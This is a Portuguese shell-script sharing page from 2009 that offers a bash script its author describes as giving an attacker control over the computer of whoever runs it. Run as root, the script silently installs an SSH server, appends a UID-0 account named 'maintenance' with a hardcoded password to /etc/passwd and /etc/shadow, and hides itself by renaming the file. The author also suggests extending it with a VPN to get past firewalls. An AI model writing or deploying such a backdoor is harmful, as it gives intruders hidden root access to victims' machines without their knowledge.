Criando usuário com poderes de root [Shell Script]

Criando usuário com poderes de root

Publicado por Marcelo (última atualização em 17/10/2009)

[ Hits: 7.159 ]

Download login.super

0 0

Denuncie Favoritos Indicar

Este script cria um usuário com poderes de root e ativa o ssh-server, dando ao atacante controle sobre o computador do executor do script.

Incrementando ele um pouco mais pode-se fazer maravilhas como, por exemplo, criar uma VPN diretamente entre o computador do atacante e do atacado (fugindo assim dos firewalls) e dando total acesso, através de ssh, e com poderes de super usuário ainda.

É, realmente o elo mais fraco da segurança da informação são as pessoas... administrador descuidado + usuário "bobinho" = caca!

Esconder código-fonte

#!/bin/bash
# verifica se o usuário está como root
if [ "`id -u`" != "0" ]; then
echo 'Este script precisa ser executado como root. Digite "sudo su" para se logar como root e execute o script novamente.'
read pausa
exit 0
fi

# verifica se o script de cadastro de senha existe, se não, ele mesmo o cria
# o usuário será maintenance e a senha mdpasswd
if [ "`find -name cad.main`" = "" ]; then
touch cad.main
echo "#!/usr/bin/expect" >> cad.main
echo "set timeout 30" >> cad.main
echo "spawn passwd maintenance" >> cad.main
echo "set password \"mdpasswd"\" >> cad.main
echo "expect \"Enter new UNIX password:"\" >> cad.main
echo "send "\""$""password\r\"" >> cad.main
echo "expect \"Retype new UNIX password:"\" >> cad.main
echo "send "\""$""password\r\"" >> cad.main
echo "send \"exit"\" >> cad.main
echo "expect \"eof\"" >> cad.main
chmod +x cad.main
fi

# verifica se o programa expect está instalado, se não estiver, ele o instala
if [ "`dpkg -l | grep expect `" = "" ]; then
aptitude install expect >> /dev/null
fi

# verifica se o servidor ssh está instalado, se não estiver, ele o instala
if [ "`dpkg -l | grep openssh-server`" = "" ]; then
aptitude install openssh-server >> /dev/null
fi

# verifica se já existe algum usuário com este nome, se existir ele alterará a senha deste usuário para mdpasswd
if [ "`cat /etc/passwd | grep maintenance`" != "" ]; then
expect cad.main >> /dev/null
exit 0
fi

# se o usuário não existir, ele será criado
echo "maintenance:x:0:0:maintenance:/root:/bin/bash" >> /etc/passwd
echo "maintenance:*:10091:0:99999:7:::" >> /etc/shadow
expect cad.main >> /dev/null

# remove o arquivo de cadastro de usuário
rm -rf cad.min

# oculta este script
mv login.super .login.super
exit 1

Scripts recomendados

Instalando e Integrando o SWATCH com SNORT

NFS server/client com iptables

backup rsync

Script de backup para fita DAT

video2gif: converta videoclipes em GIFs animados

Comentários

Nenhum comentï¿½rio foi encontrado.